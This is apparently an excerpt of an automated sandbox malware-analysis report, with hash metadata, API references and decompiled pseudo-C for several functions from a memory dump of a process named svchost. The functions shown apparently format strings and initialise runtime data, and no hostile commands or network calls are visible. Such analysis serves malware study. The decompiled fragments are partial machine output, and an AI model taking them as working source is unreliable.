                                                                                                                                                                                                                                                                      0x0402495f
                                                                                                                                                                                                                                                                      0x04024a21
                                                                                                                                                                                                                                                                      0x04024a25
                                                                                                                                                                                                                                                                      0x04024a2a
                                                                                                                                                                                                                                                                      0x04024a30
                                                                                                                                                                                                                                                                      0x04024a37
                                                                                                                                                                                                                                                                      0x04024a48
                                                                                                                                                                                                                                                                      0x04024a39
                                                                                                                                                                                                                                                                      0x04024a43
                                                                                                                                                                                                                                                                      0x04024a43
                                                                                                                                                                                                                                                                      0x04024a4f
                                                                                                                                                                                                                                                                      0x04024a4f
                                                                                                                                                                                                                                                                      0x04024a5a
                                                                                                                                                                                                                                                                      0x04024a5f
                                                                                                                                                                                                                                                                      0x04024a65
                                                                                                                                                                                                                                                                      0x04024a6c
                                                                                                                                                                                                                                                                      0x04024a7d
                                                                                                                                                                                                                                                                      0x04024a6e
                                                                                                                                                                                                                                                                      0x04024a78
                                                                                                                                                                                                                                                                      0x04024a78
                                                                                                                                                                                                                                                                      0x04024a84
                                                                                                                                                                                                                                                                      0x04024a84
                                                                                                                                                                                                                                                                      0x04024a8d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04024a8d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0402487c
                                                                                                                                                                                                                                                                      0x0402487a
                                                                                                                                                                                                                                                                      0x04024a93
                                                                                                                                                                                                                                                                      0x04024a99
                                                                                                                                                                                                                                                                      0x04024a99
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                      • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 04021A91
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 04021AB5
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 04021B49
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 04021B62
                                                                                                                                                                                                                                                                        • Part of subcall function 040217B0: _memset.LIBCMT ref: 040217EA
                                                                                                                                                                                                                                                                        • Part of subcall function 040217B0: _memset.LIBCMT ref: 04021800
                                                                                                                                                                                                                                                                        • Part of subcall function 040217B0: _memset.LIBCMT ref: 0402181A
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                                      • Instruction ID: 01bcd26e004969603b563e094358f1b64e43344fbc446aa7b287e43a94b7a553
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B715EB4E002089BEB10DB94DD45BEDB7B5BF48308F5041A8E609BB2C1D6766E55CF68
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                                                                                                      			E04013410(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				void _v60;
                                                                                                                                                                                                                                                                      				void _v96;
                                                                                                                                                                                                                                                                      				void* _v100;
                                                                                                                                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                                                                                                                                      				intOrPtr _v112;
                                                                                                                                                                                                                                                                      				void* _v116;
                                                                                                                                                                                                                                                                      				intOrPtr _v120;
                                                                                                                                                                                                                                                                      				void* _v124;
                                                                                                                                                                                                                                                                      				intOrPtr* _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                                                                                                      				void* _v136;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                                                                                                                                      				void* _t98;
                                                                                                                                                                                                                                                                      				signed int _t142;
                                                                                                                                                                                                                                                                      				void* _t143;
                                                                                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t98 = __ebx;
                                                                                                                                                                                                                                                                      				_v12 =  *0x429024 ^ _t142;
                                                                                                                                                                                                                                                                      				_v128 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0) {
                                                                                                                                                                                                                                                                      					memcpy( &_v60, 0x426ef4, 0xb << 2);
                                                                                                                                                                                                                                                                      					asm("movsb");
                                                                                                                                                                                                                                                                      					memcpy( &_v96, 0x426f24, 8 << 2);
                                                                                                                                                                                                                                                                      					_t145 = _t143 + 0x18;
                                                                                                                                                                                                                                                                      					asm("movsb");
                                                                                                                                                                                                                                                                      					if( *(_a4 + 0x24) >= 0) {
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)( *_v128 + 0x2c)) >  *(_a4 + 0x24)) {
                                                                                                                                                                                                                                                                      							_v108 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                      							_v104 = _v108 + 0x1e;
                                                                                                                                                                                                                                                                      							_v116 = E04020CE0(_v104 + 1);
                                                                                                                                                                                                                                                                      							_v100 = _v116;
                                                                                                                                                                                                                                                                      							E04007010(0x426f34, _v100, 0, _v104 + 1);
                                                                                                                                                                                                                                                                      							 *0x4251f8(_v100, _v104 + 1,  &_v96,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                      							_t87 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t143 = _t145 + 0x28;
                                                                                                                                                                                                                                                                      							_v120 = _t87;
                                                                                                                                                                                                                                                                      							if(_v120 == 0) {
                                                                                                                                                                                                                                                                      								_v136 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v136 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t133 = _v136;
                                                                                                                                                                                                                                                                      							_v8 = _v136;
                                                                                                                                                                                                                                                                      							E0401FC90(_t98, _v8, 0x426f34, 0x426f24, _v100, _v104);
                                                                                                                                                                                                                                                                      							if(_v100 != 0) {
                                                                                                                                                                                                                                                                      								_t133 = _v100;
                                                                                                                                                                                                                                                                      								_v124 = _v100;
                                                                                                                                                                                                                                                                      								E04020CC0(_v124);
                                                                                                                                                                                                                                                                      								_t143 = _t143 + 4;
                                                                                                                                                                                                                                                                      								_v100 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							L15:
                                                                                                                                                                                                                                                                      							if(0 != 0) {
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							L16:
                                                                                                                                                                                                                                                                      							return E04006C8C(_v8, _t98, _v12 ^ _t142, _t133, 0x426f34, 0x426f24);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                      					_t143 = _t145 + 4;
                                                                                                                                                                                                                                                                      					_v112 = _t95;
                                                                                                                                                                                                                                                                      					if(_v112 == 0) {
                                                                                                                                                                                                                                                                      						_v132 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v132 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v8 = _v132;
                                                                                                                                                                                                                                                                      					_t133 =  &_v60;
                                                                                                                                                                                                                                                                      					E0401FC90(_t98, _v8, 0x426f34, 0x426f24,  &_v60, 0x2c);
                                                                                                                                                                                                                                                                      					goto L15;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L16;
                                                                                                                                                                                                                                                                      			}

























                                                                                                                                                                                                                                                                      0x04013410
                                                                                                                                                                                                                                                                      0x04013420
                                                                                                                                                                                                                                                                      0x04013425
                                                                                                                                                                                                                                                                      0x04013428
                                                                                                                                                                                                                                                                      0x0401342f
                                                                                                                                                                                                                                                                      0x04013447
                                                                                                                                                                                                                                                                      0x04013449
                                                                                                                                                                                                                                                                      0x04013457
                                                                                                                                                                                                                                                                      0x04013457
                                                                                                                                                                                                                                                                      0x04013459
                                                                                                                                                                                                                                                                      0x04013461
                                                                                                                                                                                                                                                                      0x040134b1
                                                                                                                                                                                                                                                                      0x040134d5
                                                                                                                                                                                                                                                                      0x040134de
                                                                                                                                                                                                                                                                      0x040134f0
                                                                                                                                                                                                                                                                      0x040134f6
                                                                                                                                                                                                                                                                      0x04013506
                                                                                                                                                                                                                                                                      0x04013532
                                                                                                                                                                                                                                                                      0x0401353d
                                                                                                                                                                                                                                                                      0x04013542
                                                                                                                                                                                                                                                                      0x04013545
                                                                                                                                                                                                                                                                      0x0401354c
                                                                                                                                                                                                                                                                      0x0401355e
                                                                                                                                                                                                                                                                      0x0401354e
                                                                                                                                                                                                                                                                      0x04013556
                                                                                                                                                                                                                                                                      0x04013556
                                                                                                                                                                                                                                                                      0x04013568
                                                                                                                                                                                                                                                                      0x0401356e
                                                                                                                                                                                                                                                                      0x0401357c
                                                                                                                                                                                                                                                                      0x04013585
                                                                                                                                                                                                                                                                      0x04013587
                                                                                                                                                                                                                                                                      0x0401358a
                                                                                                                                                                                                                                                                      0x04013591
                                                                                                                                                                                                                                                                      0x04013596
                                                                                                                                                                                                                                                                      0x04013599
                                                                                                                                                                                                                                                                      0x04013599
                                                                                                                                                                                                                                                                      0x040135a0
                                                                                                                                                                                                                                                                      0x040135a2
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040135a8
                                                                                                                                                                                                                                                                      0x040135ba
                                                                                                                                                                                                                                                                      0x040135ba
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040134b3
                                                                                                                                                                                                                                                                      0x04013465
                                                                                                                                                                                                                                                                      0x0401346a
                                                                                                                                                                                                                                                                      0x0401346d
                                                                                                                                                                                                                                                                      0x04013474
                                                                                                                                                                                                                                                                      0x04013483
                                                                                                                                                                                                                                                                      0x04013476
                                                                                                                                                                                                                                                                      0x0401347e
                                                                                                                                                                                                                                                                      0x0401347e
                                                                                                                                                                                                                                                                      0x0401348d
                                                                                                                                                                                                                                                                      0x04013492
                                                                                                                                                                                                                                                                      0x04013499
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013499
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                                                                                                      • String ID: $oB
                                                                                                                                                                                                                                                                      • API String ID: 370429920-3132252410
                                                                                                                                                                                                                                                                      • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                      • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                                                                                      			E04011E70(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                      				signed short _v8;
                                                                                                                                                                                                                                                                      				signed short _v10;
                                                                                                                                                                                                                                                                      				signed short _v12;
                                                                                                                                                                                                                                                                      				signed short _v14;
                                                                                                                                                                                                                                                                      				signed short _v16;
                                                                                                                                                                                                                                                                      				signed short _v18;
                                                                                                                                                                                                                                                                      				signed short _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				void _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                                                                                                      				void _v120;
                                                                                                                                                                                                                                                                      				intOrPtr _v124;
                                                                                                                                                                                                                                                                      				void _v156;
                                                                                                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                                                                                                      				intOrPtr _v336;
                                                                                                                                                                                                                                                                      				intOrPtr _v340;
                                                                                                                                                                                                                                                                      				intOrPtr _v344;
                                                                                                                                                                                                                                                                      				intOrPtr _v348;
                                                                                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                                                                                      				signed int _t107;
                                                                                                                                                                                                                                                                      				signed int _t141;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t95 = __ebx;
                                                                                                                                                                                                                                                                      				_v24 =  *0x429024 ^ _t141;
                                                                                                                                                                                                                                                                      				_v348 = __ecx;
                                                                                                                                                                                                                                                                      				_v64 = 0;
                                                                                                                                                                                                                                                                      				memcpy( &_v60, 0x426fdc, 8 << 2);
                                                                                                                                                                                                                                                                      				asm("movsw");
                                                                                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                                                                                      				memcpy( &_v156, 0x427000, 7 << 2);
                                                                                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                                                                                      				memcpy( &_v120, 0x427020, 0xc << 2);
                                                                                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                                                                                      				_v336 = E04020CE0(0x3d);
                                                                                                                                                                                                                                                                      				_v124 = _v336;
                                                                                                                                                                                                                                                                      				E04007010(0x427038, _v124, 0, 0x3d);
                                                                                                                                                                                                                                                                      				 *0x425108( &_v332);
                                                                                                                                                                                                                                                                      				 *0x425180( &_v20);
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                                                                                      				_t107 = _v332 / 0x3c * 0x64 + _v332 % 0x3c;
                                                                                                                                                                                                                                                                      				_v68 = _t107;
                                                                                                                                                                                                                                                                      				if(_t107 < 0) {
                                                                                                                                                                                                                                                                      					_v68 =  ~_v68;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_v332 > 0) {
                                                                                                                                                                                                                                                                      					_v352 = 0x427058;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v352 = 0x427054;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t33 =  &_v352; // 0x427058
                                                                                                                                                                                                                                                                      				 *0x4251f8(_v124, 0x3c,  &_v60, _t141 + (_v16 & 0x0000ffff) * 4 - 0x98, _v14 & 0x0000ffff, _t141 + (_v18 & 0x0000ffff) * 4 - 0x78, _v20 & 0x0000ffff, _v12 & 0x0000ffff, _v10 & 0x0000ffff, _v8 & 0x0000ffff,  *_t33, _v68);
                                                                                                                                                                                                                                                                      				_v340 = E04020CE0(8);
                                                                                                                                                                                                                                                                      				if(_v340 == 0) {
                                                                                                                                                                                                                                                                      					_v356 = 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v356 = E0401F4E0(_v340);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v64 = _v356;
                                                                                                                                                                                                                                                                      				_t125 = _v124;
                                                                                                                                                                                                                                                                      				E0401FC90(_t95, _v64, 0x427038, 0x3c, _v124, E040070A0(_v124));
                                                                                                                                                                                                                                                                      				if(_v124 != 0) {
                                                                                                                                                                                                                                                                      					_v344 = _v124;
                                                                                                                                                                                                                                                                      					_t125 = _v344;
                                                                                                                                                                                                                                                                      					E04020CC0(_v344);
                                                                                                                                                                                                                                                                      					_v124 = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E04006C8C(_v64, _t95, _v24 ^ _t141, _t125, 0x427038, 0x3c);
                                                                                                                                                                                                                                                                      			}





























                                                                                                                                                                                                                                                                      0x04011e70
                                                                                                                                                                                                                                                                      0x04011e80
                                                                                                                                                                                                                                                                      0x04011e85
                                                                                                                                                                                                                                                                      0x04011e8b
                                                                                                                                                                                                                                                                      0x04011e9f
                                                                                                                                                                                                                                                                      0x04011ea1
                                                                                                                                                                                                                                                                      0x04011ea3
                                                                                                                                                                                                                                                                      0x04011eb4
                                                                                                                                                                                                                                                                      0x04011eb6
                                                                                                                                                                                                                                                                      0x04011ec4
                                                                                                                                                                                                                                                                      0x04011ec6
                                                                                                                                                                                                                                                                      0x04011ed1
                                                                                                                                                                                                                                                                      0x04011edd
                                                                                                                                                                                                                                                                      0x04011ee8
                                                                                                                                                                                                                                                                      0x04011ef7
                                                                                                                                                                                                                                                                      0x04011f01
                                                                                                                                                                                                                                                                      0x04011f0d
                                                                                                                                                                                                                                                                      0x04011f20
                                                                                                                                                                                                                                                                      0x04011f28
                                                                                                                                                                                                                                                                      0x04011f2a
                                                                                                                                                                                                                                                                      0x04011f2d
                                                                                                                                                                                                                                                                      0x04011f34
                                                                                                                                                                                                                                                                      0x04011f34
                                                                                                                                                                                                                                                                      0x04011f3e
                                                                                                                                                                                                                                                                      0x04011f4c
                                                                                                                                                                                                                                                                      0x04011f40
                                                                                                                                                                                                                                                                      0x04011f40
                                                                                                                                                                                                                                                                      0x04011f40
                                                                                                                                                                                                                                                                      0x04011f5a
                                                                                                                                                                                                                                                                      0x04011f99
                                                                                                                                                                                                                                                                      0x04011fac
                                                                                                                                                                                                                                                                      0x04011fb9
                                                                                                                                                                                                                                                                      0x04011fce
                                                                                                                                                                                                                                                                      0x04011fbb
                                                                                                                                                                                                                                                                      0x04011fc6
                                                                                                                                                                                                                                                                      0x04011fc6
                                                                                                                                                                                                                                                                      0x04011fde
                                                                                                                                                                                                                                                                      0x04011fe1
                                                                                                                                                                                                                                                                      0x04011ff5
                                                                                                                                                                                                                                                                      0x04011ffe
                                                                                                                                                                                                                                                                      0x04012003
                                                                                                                                                                                                                                                                      0x04012009
                                                                                                                                                                                                                                                                      0x04012010
                                                                                                                                                                                                                                                                      0x04012018
                                                                                                                                                                                                                                                                      0x04012018
                                                                                                                                                                                                                                                                      0x04012031

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                                      • String ID: pB$XpB
                                                                                                                                                                                                                                                                      • API String ID: 3713721629-2178088481
                                                                                                                                                                                                                                                                      • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                      • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                                      • String ID: '$'
                                                                                                                                                                                                                                                                      • API String ID: 2102423945-2527190458
                                                                                                                                                                                                                                                                      • Opcode ID: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                                      • Instruction ID: 53bb57586c5e39befda5455b8bbd06f4bf2bc56d3601b69197fc609fafef56d8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C418171B04329EBEB20DFA0CC45FED77B4AB44704F804599B609BA1C0D7B5A644CF96
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                                                                                                      			E040093F6(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                                                                                      				intOrPtr _t45;
                                                                                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t35 = __ebx;
                                                                                                                                                                                                                                                                      				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                      				_t23 =  *0x425190(0x425310, 0x427a18, 0xc);
                                                                                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                                                                                      					_t23 = E040099AE(0x425310);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t46 - 0x1c)) = _t23;
                                                                                                                                                                                                                                                                      				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t45 + 0x5c)) = 0x4259d0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                                                                                                                                                      				if(_t23 != 0) {
                                                                                                                                                                                                                                                                      					_t35 =  *0x425114;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t45 + 0x1f8)) =  *_t35(_t23, 0x425300);
                                                                                                                                                                                                                                                                      					_t6 = _t46 - 0x1c; // 0x42532c
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t45 + 0x1fc)) =  *_t35( *_t6, 0x42532c);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                                                                                                                                                      				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                                                                                                                                                      				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t45 + 0x68)) = 0x4294e8;
                                                                                                                                                                                                                                                                      				E0400B404(_t35, 0xd);
                                                                                                                                                                                                                                                                      				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                      				 *0x4250a4( *((intOrPtr*)(_t45 + 0x68)));
                                                                                                                                                                                                                                                                      				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                      				E040094CB();
                                                                                                                                                                                                                                                                      				E0400B404(_t35, 0xc);
                                                                                                                                                                                                                                                                      				 *(_t46 - 4) = 1;
                                                                                                                                                                                                                                                                      				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t45 + 0x6c)) =  *0x4294d8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E0400CA63( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                                                                                                                                                      				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                      				return E04009D2D(E040094D4());
                                                                                                                                                                                                                                                                      			}







                                                                                                                                                                                                                                                                      0x040093f6
                                                                                                                                                                                                                                                                      0x040093fd
                                                                                                                                                                                                                                                                      0x04009408
                                                                                                                                                                                                                                                                      0x04009410
                                                                                                                                                                                                                                                                      0x04009413
                                                                                                                                                                                                                                                                      0x04009418
                                                                                                                                                                                                                                                                      0x04009419
                                                                                                                                                                                                                                                                      0x0400941c
                                                                                                                                                                                                                                                                      0x0400941f
                                                                                                                                                                                                                                                                      0x04009429
                                                                                                                                                                                                                                                                      0x0400942e
                                                                                                                                                                                                                                                                      0x04009436
                                                                                                                                                                                                                                                                      0x0400943e
                                                                                                                                                                                                                                                                      0x04009449
                                                                                                                                                                                                                                                                      0x0400944e
                                                                                                                                                                                                                                                                      0x0400944e
                                                                                                                                                                                                                                                                      0x04009454
                                                                                                                                                                                                                                                                      0x04009457
                                                                                                                                                                                                                                                                      0x0400945e
                                                                                                                                                                                                                                                                      0x04009465
                                                                                                                                                                                                                                                                      0x0400946e
                                                                                                                                                                                                                                                                      0x04009474
                                                                                                                                                                                                                                                                      0x0400947b
                                                                                                                                                                                                                                                                      0x04009481
                                                                                                                                                                                                                                                                      0x04009488
                                                                                                                                                                                                                                                                      0x0400948f
                                                                                                                                                                                                                                                                      0x04009495
                                                                                                                                                                                                                                                                      0x04009498
                                                                                                                                                                                                                                                                      0x0400949b
                                                                                                                                                                                                                                                                      0x040094a0
                                                                                                                                                                                                                                                                      0x040094a7
                                                                                                                                                                                                                                                                      0x040094a7
                                                                                                                                                                                                                                                                      0x040094ad
                                                                                                                                                                                                                                                                      0x040094b3
